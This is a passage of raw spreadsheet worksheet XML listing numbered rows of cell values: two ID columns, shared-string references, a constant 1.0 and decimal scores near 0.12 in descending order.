      <c r="C6286" s="2" t="s">
        <v>5983</v>
      </c>
      <c r="D6286" s="2">
        <v>1.0</v>
      </c>
      <c r="E6286" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6286" s="2">
        <v>0.1214689265536723</v>
      </c>
    </row>
    <row r="6287" ht="15.75" customHeight="1">
      <c r="A6287" s="1">
        <v>18603.0</v>
      </c>
      <c r="B6287" s="2">
        <v>5.3281503E7</v>
      </c>
      <c r="C6287" s="2" t="s">
        <v>5984</v>
      </c>
      <c r="D6287" s="2">
        <v>1.0</v>
      </c>
      <c r="E6287" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6287" s="2">
        <v>0.1214689265536723</v>
      </c>
    </row>
    <row r="6288" ht="15.75" customHeight="1">
      <c r="A6288" s="1">
        <v>19527.0</v>
      </c>
      <c r="B6288" s="2">
        <v>5.5977992E7</v>
      </c>
      <c r="C6288" s="2" t="s">
        <v>5985</v>
      </c>
      <c r="D6288" s="2">
        <v>1.0</v>
      </c>
      <c r="E6288" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6288" s="2">
        <v>0.1214689265536723</v>
      </c>
    </row>
    <row r="6289" ht="15.75" customHeight="1">
      <c r="A6289" s="1">
        <v>20288.0</v>
      </c>
      <c r="B6289" s="2">
        <v>1.1198795E7</v>
      </c>
      <c r="C6289" s="2" t="s">
        <v>5986</v>
      </c>
      <c r="D6289" s="2">
        <v>1.0</v>
      </c>
      <c r="E6289" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6289" s="2">
        <v>0.1214689265536723</v>
      </c>
    </row>
    <row r="6290" ht="15.75" customHeight="1">
      <c r="A6290" s="1">
        <v>20598.0</v>
      </c>
      <c r="B6290" s="2">
        <v>1.3836743E7</v>
      </c>
      <c r="C6290" s="2" t="s">
        <v>5987</v>
      </c>
      <c r="D6290" s="2">
        <v>1.0</v>
      </c>
      <c r="E6290" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6290" s="2">
        <v>0.1214689265536723</v>
      </c>
    </row>
    <row r="6291" ht="15.75" customHeight="1">
      <c r="A6291" s="1">
        <v>20693.0</v>
      </c>
      <c r="B6291" s="2">
        <v>1.4523182E7</v>
      </c>
      <c r="C6291" s="2" t="s">
        <v>5988</v>
      </c>
      <c r="D6291" s="2">
        <v>1.0</v>
      </c>
      <c r="E6291" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6291" s="2">
        <v>0.1214689265536723</v>
      </c>
    </row>
    <row r="6292" ht="15.75" customHeight="1">
      <c r="A6292" s="1">
        <v>21652.0</v>
      </c>
      <c r="B6292" s="2">
        <v>2.4907308E7</v>
      </c>
      <c r="C6292" s="2" t="s">
        <v>5989</v>
      </c>
      <c r="D6292" s="2">
        <v>1.0</v>
      </c>
      <c r="E6292" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6292" s="2">
        <v>0.1214689265536723</v>
      </c>
    </row>
    <row r="6293" ht="15.75" customHeight="1">
      <c r="A6293" s="1">
        <v>23469.0</v>
      </c>
      <c r="B6293" s="2">
        <v>5.7172574E7</v>
      </c>
      <c r="C6293" s="2" t="s">
        <v>5990</v>
      </c>
      <c r="D6293" s="2">
        <v>1.0</v>
      </c>
      <c r="E6293" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6293" s="2">
        <v>0.1214689265536723</v>
      </c>
    </row>
    <row r="6294" ht="15.75" customHeight="1">
      <c r="A6294" s="1">
        <v>23905.0</v>
      </c>
      <c r="B6294" s="2">
        <v>8489082.0</v>
      </c>
      <c r="C6294" s="2" t="s">
        <v>5991</v>
      </c>
      <c r="D6294" s="2">
        <v>1.0</v>
      </c>
      <c r="E6294" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6294" s="2">
        <v>0.1214689265536723</v>
      </c>
    </row>
    <row r="6295" ht="15.75" customHeight="1">
      <c r="A6295" s="1">
        <v>24931.0</v>
      </c>
      <c r="B6295" s="2">
        <v>1.2455057E7</v>
      </c>
      <c r="C6295" s="2" t="s">
        <v>5992</v>
      </c>
      <c r="D6295" s="2">
        <v>1.0</v>
      </c>
      <c r="E6295" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6295" s="2">
        <v>0.1214689265536723</v>
      </c>
    </row>
    <row r="6296" ht="15.75" customHeight="1">
      <c r="A6296" s="1">
        <v>25433.0</v>
      </c>
      <c r="B6296" s="2">
        <v>1.3836742E7</v>
      </c>
      <c r="C6296" s="2" t="s">
        <v>5987</v>
      </c>
      <c r="D6296" s="2">
        <v>1.0</v>
      </c>
      <c r="E6296" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6296" s="2">
        <v>0.1214689265536723</v>
      </c>
    </row>
    <row r="6297" ht="15.75" customHeight="1">
      <c r="A6297" s="1">
        <v>26575.0</v>
      </c>
      <c r="B6297" s="2">
        <v>1.7890298E7</v>
      </c>
      <c r="C6297" s="2" t="s">
        <v>5993</v>
      </c>
      <c r="D6297" s="2">
        <v>1.0</v>
      </c>
      <c r="E6297" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6297" s="2">
        <v>0.1214689265536723</v>
      </c>
    </row>
    <row r="6298" ht="15.75" customHeight="1">
      <c r="A6298" s="1">
        <v>26888.0</v>
      </c>
      <c r="B6298" s="2">
        <v>1.9228756E7</v>
      </c>
      <c r="C6298" s="2" t="s">
        <v>5994</v>
      </c>
      <c r="D6298" s="2">
        <v>1.0</v>
      </c>
      <c r="E6298" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6298" s="2">
        <v>0.1214689265536723</v>
      </c>
    </row>
    <row r="6299" ht="15.75" customHeight="1">
      <c r="A6299" s="1">
        <v>28301.0</v>
      </c>
      <c r="B6299" s="2">
        <v>2.5620721E7</v>
      </c>
      <c r="C6299" s="2" t="s">
        <v>5995</v>
      </c>
      <c r="D6299" s="2">
        <v>1.0</v>
      </c>
      <c r="E6299" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6299" s="2">
        <v>0.1214689265536723</v>
      </c>
    </row>
    <row r="6300" ht="15.75" customHeight="1">
      <c r="A6300" s="1">
        <v>28851.0</v>
      </c>
      <c r="B6300" s="2">
        <v>2.9012449E7</v>
      </c>
      <c r="C6300" s="2" t="s">
        <v>5996</v>
      </c>
      <c r="D6300" s="2">
        <v>1.0</v>
      </c>
      <c r="E6300" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6300" s="2">
        <v>0.1214689265536723</v>
      </c>
    </row>
    <row r="6301" ht="15.75" customHeight="1">
      <c r="A6301" s="1">
        <v>29027.0</v>
      </c>
      <c r="B6301" s="2">
        <v>3.0101594E7</v>
      </c>
      <c r="C6301" s="2" t="s">
        <v>5997</v>
      </c>
      <c r="D6301" s="2">
        <v>1.0</v>
      </c>
      <c r="E6301" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6301" s="2">
        <v>0.1214689265536723</v>
      </c>
    </row>
    <row r="6302" ht="15.75" customHeight="1">
      <c r="A6302" s="1">
        <v>30414.0</v>
      </c>
      <c r="B6302" s="2">
        <v>3.8801859E7</v>
      </c>
      <c r="C6302" s="2" t="s">
        <v>5998</v>
      </c>
      <c r="D6302" s="2">
        <v>1.0</v>
      </c>
      <c r="E6302" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6302" s="2">
        <v>0.1214689265536723</v>
      </c>
    </row>
    <row r="6303" ht="15.75" customHeight="1">
      <c r="A6303" s="1">
        <v>30852.0</v>
      </c>
      <c r="B6303" s="2">
        <v>4.597838E7</v>
      </c>
      <c r="C6303" s="2" t="s">
        <v>5999</v>
      </c>
      <c r="D6303" s="2">
        <v>1.0</v>
      </c>
      <c r="E6303" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6303" s="2">
        <v>0.1214689265536723</v>
      </c>
    </row>
    <row r="6304" ht="15.75" customHeight="1">
      <c r="A6304" s="1">
        <v>32516.0</v>
      </c>
      <c r="B6304" s="2">
        <v>5.7172573E7</v>
      </c>
      <c r="C6304" s="2" t="s">
        <v>5990</v>
      </c>
      <c r="D6304" s="2">
        <v>1.0</v>
      </c>
      <c r="E6304" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6304" s="2">
        <v>0.1214689265536723</v>
      </c>
    </row>
    <row r="6305" ht="15.75" customHeight="1">
      <c r="A6305" s="1">
        <v>33867.0</v>
      </c>
      <c r="B6305" s="2">
        <v>9072520.0</v>
      </c>
      <c r="C6305" s="2" t="s">
        <v>6000</v>
      </c>
      <c r="D6305" s="2">
        <v>1.0</v>
      </c>
      <c r="E6305" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6305" s="2">
        <v>0.1214689265536723</v>
      </c>
    </row>
    <row r="6306" ht="15.75" customHeight="1">
      <c r="A6306" s="1">
        <v>33949.0</v>
      </c>
      <c r="B6306" s="2">
        <v>9299843.0</v>
      </c>
      <c r="C6306" s="2" t="s">
        <v>6001</v>
      </c>
      <c r="D6306" s="2">
        <v>1.0</v>
      </c>
      <c r="E6306" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6306" s="2">
        <v>0.1214689265536723</v>
      </c>
    </row>
    <row r="6307" ht="15.75" customHeight="1">
      <c r="A6307" s="1">
        <v>30428.0</v>
      </c>
      <c r="B6307" s="2">
        <v>3898965.0</v>
      </c>
      <c r="C6307" s="2" t="s">
        <v>6002</v>
      </c>
      <c r="D6307" s="2">
        <v>1.0</v>
      </c>
      <c r="E6307" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6307" s="2">
        <v>0.1212962962962963</v>
      </c>
    </row>
    <row r="6308" ht="15.75" customHeight="1">
      <c r="A6308" s="1">
        <v>3233.0</v>
      </c>
      <c r="B6308" s="2">
        <v>3.734709E7</v>
      </c>
      <c r="C6308" s="2" t="s">
        <v>6003</v>
      </c>
      <c r="D6308" s="2">
        <v>1.0</v>
      </c>
      <c r="E6308" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6308" s="2">
        <v>0.1209677419354839</v>
      </c>
    </row>
    <row r="6309" ht="15.75" customHeight="1">
      <c r="A6309" s="1">
        <v>26538.0</v>
      </c>
      <c r="B6309" s="2">
        <v>1.7710399E7</v>
      </c>
      <c r="C6309" s="2" t="s">
        <v>6004</v>
      </c>
      <c r="D6309" s="2">
        <v>1.0</v>
      </c>
      <c r="E6309" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6309" s="2">
        <v>0.1208112874779542</v>
      </c>
    </row>
    <row r="6310" ht="15.75" customHeight="1">
      <c r="A6310" s="1">
        <v>28604.0</v>
      </c>
      <c r="B6310" s="2">
        <v>2.7095862E7</v>
      </c>
      <c r="C6310" s="2" t="s">
        <v>6005</v>
      </c>
      <c r="D6310" s="2">
        <v>1.0</v>
      </c>
      <c r="E6310" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6310" s="2">
        <v>0.1208112874779542</v>
      </c>
    </row>
    <row r="6311" ht="15.75" customHeight="1">
      <c r="A6311" s="1">
        <v>31722.0</v>
      </c>
      <c r="B6311" s="2">
        <v>5.211402E7</v>
      </c>
      <c r="C6311" s="2" t="s">
        <v>6006</v>
      </c>
      <c r="D6311" s="2">
        <v>1.0</v>
      </c>
      <c r="E6311" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6311" s="2">
        <v>0.1206597222222223</v>
      </c>
    </row>
    <row r="6312" ht="15.75" customHeight="1">
      <c r="A6312" s="1">
        <v>30831.0</v>
      </c>
      <c r="B6312" s="2">
        <v>4543140.0</v>
      </c>
      <c r="C6312" s="2" t="s">
        <v>6007</v>
      </c>
      <c r="D6312" s="2">
        <v>1.0</v>
      </c>
      <c r="E6312" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6312" s="2">
        <v>0.1206597222222222</v>
      </c>
    </row>
    <row r="6313" ht="15.75" customHeight="1">
      <c r="A6313" s="1">
        <v>3461.0</v>
      </c>
      <c r="B6313" s="2">
        <v>3831147.0</v>
      </c>
      <c r="C6313" s="2" t="s">
        <v>6008</v>
      </c>
      <c r="D6313" s="2">
        <v>1.0</v>
      </c>
      <c r="E6313" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6313" s="2">
        <v>0.1205128205128205</v>
      </c>
    </row>
    <row r="6314" ht="15.75" customHeight="1">
      <c r="A6314" s="1">
        <v>25638.0</v>
      </c>
      <c r="B6314" s="2">
        <v>1.4497268E7</v>
      </c>
      <c r="C6314" s="2" t="s">
        <v>6009</v>
      </c>
      <c r="D6314" s="2">
        <v>1.0</v>
      </c>
      <c r="E6314" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6314" s="2">
        <v>0.1205128205128205</v>
      </c>
    </row>
    <row r="6315" ht="15.75" customHeight="1">
      <c r="A6315" s="1">
        <v>29084.0</v>
      </c>
      <c r="B6315" s="2">
        <v>3.0348999E7</v>
      </c>
      <c r="C6315" s="2" t="s">
        <v>6010</v>
      </c>
      <c r="D6315" s="2">
        <v>1.0</v>
      </c>
      <c r="E6315" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6315" s="2">
        <v>0.1203703703703704</v>
      </c>
    </row>
    <row r="6316" ht="15.75" customHeight="1">
      <c r="A6316" s="1">
        <v>31947.0</v>
      </c>
      <c r="B6316" s="2">
        <v>5.3098272E7</v>
      </c>
      <c r="C6316" s="2" t="s">
        <v>6011</v>
      </c>
      <c r="D6316" s="2">
        <v>1.0</v>
      </c>
      <c r="E6316" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6316" s="2">
        <v>0.1203703703703704</v>
      </c>
    </row>
    <row r="6317" ht="15.75" customHeight="1">
      <c r="A6317" s="1">
        <v>26429.0</v>
      </c>
      <c r="B6317" s="2">
        <v>1.7164198E7</v>
      </c>
      <c r="C6317" s="2" t="s">
        <v>6012</v>
      </c>
      <c r="D6317" s="2">
        <v>1.0</v>
      </c>
      <c r="E6317" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6317" s="2">
        <v>0.1203703703703703</v>
      </c>
    </row>
    <row r="6318" ht="15.75" customHeight="1">
      <c r="A6318" s="1">
        <v>28256.0</v>
      </c>
      <c r="B6318" s="2">
        <v>2.5348471E7</v>
      </c>
      <c r="C6318" s="2" t="s">
        <v>6013</v>
      </c>
      <c r="D6318" s="2">
        <v>1.0</v>
      </c>
      <c r="E6318" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6318" s="2">
        <v>0.1203703703703703</v>
      </c>
    </row>
    <row r="6319" ht="15.75" customHeight="1">
      <c r="A6319" s="1">
        <v>20656.0</v>
      </c>
      <c r="B6319" s="2">
        <v>1.4280376E7</v>
      </c>
      <c r="C6319" s="2" t="s">
        <v>6014</v>
      </c>
      <c r="D6319" s="2">
        <v>1.0</v>
      </c>
      <c r="E6319" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6319" s="2">
        <v>0.1202020202020202</v>
      </c>
    </row>
    <row r="6320" ht="15.75" customHeight="1">
      <c r="A6320" s="1">
        <v>23014.0</v>
      </c>
      <c r="B6320" s="2">
        <v>4986091.0</v>
      </c>
      <c r="C6320" s="2" t="s">
        <v>6015</v>
      </c>
      <c r="D6320" s="2">
        <v>1.0</v>
      </c>
      <c r="E6320" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6320" s="2">
        <v>0.1202020202020202</v>
      </c>
    </row>
    <row r="6321" ht="15.75" customHeight="1">
      <c r="A6321" s="1">
        <v>23743.0</v>
      </c>
      <c r="B6321" s="2">
        <v>7370362.0</v>
      </c>
      <c r="C6321" s="2" t="s">
        <v>6016</v>
      </c>
      <c r="D6321" s="2">
        <v>1.0</v>
      </c>
      <c r="E6321" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6321" s="2">
        <v>0.1202020202020202</v>
      </c>
    </row>
    <row r="6322" ht="15.75" customHeight="1">
      <c r="A6322" s="1">
        <v>31646.0</v>
      </c>
      <c r="B6322" s="2">
        <v>5.1556379E7</v>
      </c>
      <c r="C6322" s="2" t="s">
        <v>6017</v>
      </c>
      <c r="D6322" s="2">
        <v>1.0</v>
      </c>
      <c r="E6322" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6322" s="2">
        <v>0.1202020202020202</v>
      </c>
    </row>
    <row r="6323" ht="15.75" customHeight="1">
      <c r="A6323" s="1">
        <v>32686.0</v>
      </c>
      <c r="B6323" s="2">
        <v>5953420.0</v>
      </c>
      <c r="C6323" s="2" t="s">
        <v>6018</v>
      </c>
      <c r="D6323" s="2">
        <v>1.0</v>
      </c>
      <c r="E6323" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6323" s="2">
        <v>0.1202020202020202</v>
      </c>
    </row>
    <row r="6324" ht="15.75" customHeight="1">
      <c r="A6324" s="1">
        <v>7746.0</v>
      </c>
      <c r="B6324" s="2">
        <v>5.2078075E7</v>
      </c>
      <c r="C6324" s="2" t="s">
        <v>6019</v>
      </c>
      <c r="D6324" s="2">
        <v>1.0</v>
      </c>
      <c r="E6324" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6324" s="2">
        <v>0.1200980392156863</v>
      </c>
    </row>
    <row r="6325" ht="15.75" customHeight="1">
      <c r="A6325" s="1">
        <v>14419.0</v>
      </c>
      <c r="B6325" s="2">
        <v>3.9242947E7</v>
      </c>
      <c r="C6325" s="2" t="s">
        <v>6020</v>
      </c>
      <c r="D6325" s="2">
        <v>1.0</v>
      </c>
      <c r="E6325" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6325" s="2">
        <v>0.1200980392156863</v>
      </c>
    </row>
    <row r="6326" ht="15.75" customHeight="1">
      <c r="A6326" s="1">
        <v>21870.0</v>
      </c>
      <c r="B6326" s="2">
        <v>2.7489554E7</v>
      </c>
      <c r="C6326" s="2" t="s">
        <v>6021</v>
      </c>
      <c r="D6326" s="2">
        <v>1.0</v>
      </c>
      <c r="E6326" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6326" s="2">
        <v>0.1200396825396825</v>
      </c>
    </row>
    <row r="6327" ht="15.75" customHeight="1">
      <c r="A6327" s="1">
        <v>32338.0</v>
      </c>
      <c r="B6327" s="2">
        <v>5.5912244E7</v>
      </c>
      <c r="C6327" s="2" t="s">
        <v>6022</v>
      </c>
      <c r="D6327" s="2">
        <v>1.0</v>
      </c>
      <c r="E6327" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6327" s="2">
        <v>0.1200396825396825</v>
      </c>
    </row>
    <row r="6328" ht="15.75" customHeight="1">
      <c r="A6328" s="1">
        <v>17322.0</v>
      </c>
      <c r="B6328" s="2">
        <v>4.934234E7</v>
      </c>
      <c r="C6328" s="2" t="s">
        <v>6023</v>
      </c>
      <c r="D6328" s="2">
        <v>1.0</v>
      </c>
      <c r="E6328" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6328" s="2">
        <v>0.1198830409356725</v>
      </c>
    </row>
    <row r="6329" ht="15.75" customHeight="1">
      <c r="A6329" s="1">
        <v>18004.0</v>
      </c>
      <c r="B6329" s="2">
        <v>5.1427273E7</v>
      </c>
      <c r="C6329" s="2" t="s">
        <v>6024</v>
      </c>
      <c r="D6329" s="2">
        <v>1.0</v>
      </c>
      <c r="E6329" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6329" s="2">
        <v>0.1198830409356725</v>
      </c>
    </row>
    <row r="6330" ht="15.75" customHeight="1">
      <c r="A6330" s="1">
        <v>21647.0</v>
      </c>
      <c r="B6330" s="2">
        <v>2.4801311E7</v>
      </c>
      <c r="C6330" s="2" t="s">
        <v>6025</v>
      </c>
      <c r="D6330" s="2">
        <v>1.0</v>
      </c>
      <c r="E6330" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6330" s="2">
        <v>0.1198830409356725</v>
      </c>
    </row>
    <row r="6331" ht="15.75" customHeight="1">
      <c r="A6331" s="1">
        <v>22398.0</v>
      </c>
      <c r="B6331" s="2">
        <v>3.5519666E7</v>
      </c>
      <c r="C6331" s="2" t="s">
        <v>6026</v>
      </c>
      <c r="D6331" s="2">
        <v>1.0</v>
      </c>
      <c r="E6331" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6331" s="2">
        <v>0.1198830409356725</v>
      </c>
    </row>
    <row r="6332" ht="15.75" customHeight="1">
      <c r="A6332" s="1">
        <v>23917.0</v>
      </c>
      <c r="B6332" s="2">
        <v>8533328.0</v>
      </c>
      <c r="C6332" s="2" t="s">
        <v>6027</v>
      </c>
      <c r="D6332" s="2">
        <v>1.0</v>
      </c>
      <c r="E6332" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6332" s="2">
        <v>0.1198830409356725</v>
      </c>
    </row>
    <row r="6333" ht="15.75" customHeight="1">
      <c r="A6333" s="1">
        <v>23992.0</v>
      </c>
      <c r="B6333" s="2">
        <v>9197477.0</v>
      </c>
      <c r="C6333" s="2" t="s">
        <v>6028</v>
      </c>
      <c r="D6333" s="2">
        <v>1.0</v>
      </c>
      <c r="E6333" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6333" s="2">
        <v>0.1198830409356725</v>
      </c>
    </row>
    <row r="6334" ht="15.75" customHeight="1">
      <c r="A6334" s="1">
        <v>29668.0</v>
      </c>
      <c r="B6334" s="2">
        <v>3.3952722E7</v>
      </c>
      <c r="C6334" s="2" t="s">
        <v>6029</v>
      </c>
      <c r="D6334" s="2">
        <v>1.0</v>
      </c>
      <c r="E6334" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6334" s="2">
        <v>0.1198830409356725</v>
      </c>
    </row>
    <row r="6335" ht="15.75" customHeight="1">
      <c r="A6335" s="1">
        <v>33699.0</v>
      </c>
      <c r="B6335" s="2">
        <v>8466090.0</v>
      </c>
      <c r="C6335" s="2" t="s">
        <v>6030</v>
      </c>
      <c r="D6335" s="2">
        <v>1.0</v>
      </c>
      <c r="E6335" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6335" s="2">
        <v>0.1198830409356725</v>
      </c>
    </row>
    <row r="6336" ht="15.75" customHeight="1">
      <c r="A6336" s="1">
        <v>6887.0</v>
      </c>
      <c r="B6336" s="2">
        <v>4.9770706E7</v>
      </c>
      <c r="C6336" s="2" t="s">
        <v>6031</v>
      </c>
      <c r="D6336" s="2">
        <v>1.0</v>
      </c>
      <c r="E6336" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6336" s="2">
        <v>0.1197318007662835</v>
      </c>
    </row>
    <row r="6337" ht="15.75" customHeight="1">
      <c r="A6337" s="1">
        <v>27249.0</v>
      </c>
      <c r="B6337" s="2">
        <v>2.1080402E7</v>
      </c>
      <c r="C6337" s="2" t="s">
        <v>6032</v>
      </c>
      <c r="D6337" s="2">
        <v>1.0</v>
      </c>
      <c r="E6337" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6337" s="2">
        <v>0.1197318007662835</v>
      </c>
    </row>
    <row r="6338" ht="15.75" customHeight="1">
      <c r="A6338" s="1">
        <v>28425.0</v>
      </c>
      <c r="B6338" s="2">
        <v>2.642176E7</v>
      </c>
      <c r="C6338" s="2" t="s">
        <v>6033</v>
      </c>
      <c r="D6338" s="2">
        <v>1.0</v>
      </c>
      <c r="E6338" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6338" s="2">
        <v>0.1197318007662835</v>
      </c>
    </row>
    <row r="6339" ht="15.75" customHeight="1">
      <c r="A6339" s="1">
        <v>33813.0</v>
      </c>
      <c r="B6339" s="2">
        <v>8887498.0</v>
      </c>
      <c r="C6339" s="2" t="s">
        <v>6034</v>
      </c>
      <c r="D6339" s="2">
        <v>1.0</v>
      </c>
      <c r="E6339" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6339" s="2">
        <v>0.119718309859155</v>
      </c>
    </row>
    <row r="6340" ht="15.75" customHeight="1">
      <c r="A6340" s="1">
        <v>31555.0</v>
      </c>
      <c r="B6340" s="2">
        <v>5.1169836E7</v>
      </c>
      <c r="C6340" s="2" t="s">
        <v>6035</v>
      </c>
      <c r="D6340" s="2">
        <v>1.0</v>
      </c>
      <c r="E6340" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6340" s="2">
        <v>0.1197183098591549</v>
      </c>
    </row>
    <row r="6341" ht="15.75" customHeight="1">
      <c r="A6341" s="1">
        <v>3490.0</v>
      </c>
      <c r="B6341" s="2">
        <v>3.8455734E7</v>
      </c>
      <c r="C6341" s="2" t="s">
        <v>6036</v>
      </c>
      <c r="D6341" s="2">
        <v>1.0</v>
      </c>
      <c r="E6341" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6341" s="2">
        <v>0.1195856873822976</v>
      </c>
    </row>
    <row r="6342" ht="15.75" customHeight="1">
      <c r="A6342" s="1">
        <v>31189.0</v>
      </c>
      <c r="B6342" s="2">
        <v>4917211.0</v>
      </c>
      <c r="C6342" s="2" t="s">
        <v>6037</v>
      </c>
      <c r="D6342" s="2">
        <v>1.0</v>
      </c>
      <c r="E6342" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6342" s="2">
        <v>0.1195856873822976</v>
      </c>
    </row>
    <row r="6343" ht="15.75" customHeight="1">
      <c r="A6343" s="1">
        <v>8638.0</v>
      </c>
      <c r="B6343" s="2">
        <v>5.4329225E7</v>
      </c>
      <c r="C6343" s="2" t="s">
        <v>6038</v>
      </c>
      <c r="D6343" s="2">
        <v>1.0</v>
      </c>
      <c r="E6343" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6343" s="2">
        <v>0.1195856873822975</v>
      </c>
    </row>
    <row r="6344" ht="15.75" customHeight="1">
      <c r="A6344" s="1">
        <v>23851.0</v>
      </c>
      <c r="B6344" s="2">
        <v>8229868.0</v>
      </c>
      <c r="C6344" s="2" t="s">
        <v>6039</v>
      </c>
      <c r="D6344" s="2">
        <v>1.0</v>
      </c>
      <c r="E6344" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6344" s="2">
        <v>0.1195856873822975</v>
      </c>
    </row>
    <row r="6345" ht="15.75" customHeight="1">
      <c r="A6345" s="1">
        <v>25108.0</v>
      </c>
      <c r="B6345" s="2">
        <v>1.2962638E7</v>
      </c>
      <c r="C6345" s="2" t="s">
        <v>6040</v>
      </c>
      <c r="D6345" s="2">
        <v>1.0</v>
      </c>
      <c r="E6345" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6345" s="2">
        <v>0.1195856873822975</v>
      </c>
    </row>
    <row r="6346" ht="15.75" customHeight="1">
      <c r="A6346" s="1">
        <v>25240.0</v>
      </c>
      <c r="B6346" s="2">
        <v>1.3380153E7</v>
      </c>
      <c r="C6346" s="2" t="s">
        <v>6041</v>
      </c>
      <c r="D6346" s="2">
        <v>1.0</v>
      </c>
      <c r="E6346" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6346" s="2">
        <v>0.1195856873822975</v>
      </c>
    </row>
    <row r="6347" ht="15.75" customHeight="1">
      <c r="A6347" s="1">
        <v>25283.0</v>
      </c>
      <c r="B6347" s="2">
        <v>1.339665E7</v>
      </c>
      <c r="C6347" s="2" t="s">
        <v>6042</v>
      </c>
      <c r="D6347" s="2">
        <v>1.0</v>
      </c>
      <c r="E6347" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6347" s="2">
        <v>0.1195856873822975</v>
      </c>
    </row>
    <row r="6348" ht="15.75" customHeight="1">
      <c r="A6348" s="1">
        <v>31664.0</v>
      </c>
      <c r="B6348" s="2">
        <v>5.1755636E7</v>
      </c>
      <c r="C6348" s="2" t="s">
        <v>6043</v>
      </c>
      <c r="D6348" s="2">
        <v>1.0</v>
      </c>
      <c r="E6348" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6348" s="2">
        <v>0.1195856873822975</v>
      </c>
    </row>
    <row r="6349" ht="15.75" customHeight="1">
      <c r="A6349" s="1">
        <v>34050.0</v>
      </c>
      <c r="B6349" s="2">
        <v>9592528.0</v>
      </c>
      <c r="C6349" s="2" t="s">
        <v>6044</v>
      </c>
      <c r="D6349" s="2">
        <v>1.0</v>
      </c>
      <c r="E6349" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6349" s="2">
        <v>0.1195856873822975</v>
      </c>
    </row>
    <row r="6350" ht="15.75" customHeight="1">
      <c r="A6350" s="1">
        <v>8447.0</v>
      </c>
      <c r="B6350" s="2">
        <v>5.3964412E7</v>
      </c>
      <c r="C6350" s="2" t="s">
        <v>6045</v>
      </c>
      <c r="D6350" s="2">
        <v>1.0</v>
      </c>
      <c r="E6350" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6350" s="2">
        <v>0.1194444444444445</v>
      </c>
    </row>
    <row r="6351" ht="15.75" customHeight="1">
      <c r="A6351" s="1">
        <v>8615.0</v>
      </c>
      <c r="B6351" s="2">
        <v>5.4267144E7</v>
      </c>
      <c r="C6351" s="2" t="s">
        <v>6046</v>
      </c>
      <c r="D6351" s="2">
        <v>1.0</v>
      </c>
      <c r="E6351" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6351" s="2">
        <v>0.1194444444444445</v>
      </c>
    </row>
    <row r="6352" ht="15.75" customHeight="1">
      <c r="A6352" s="1">
        <v>23427.0</v>
      </c>
      <c r="B6352" s="2">
        <v>5.6425745E7</v>
      </c>
      <c r="C6352" s="2" t="s">
        <v>6047</v>
      </c>
      <c r="D6352" s="2">
        <v>1.0</v>
      </c>
      <c r="E6352" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F6352" s="2">
        <v>0.1194444444444445</v>
      </c>
    </row>
    <row r="6353" ht="15.75" customHeight="1">
      <c r="A6353" s="1">
        <v>24915.0</v>
      </c>
      <c r="B6353" s="2">
        <v>1.2353734E7</v>
      </c>
      <c r="C6353" s="2" t="s">
        <v>6048</v>
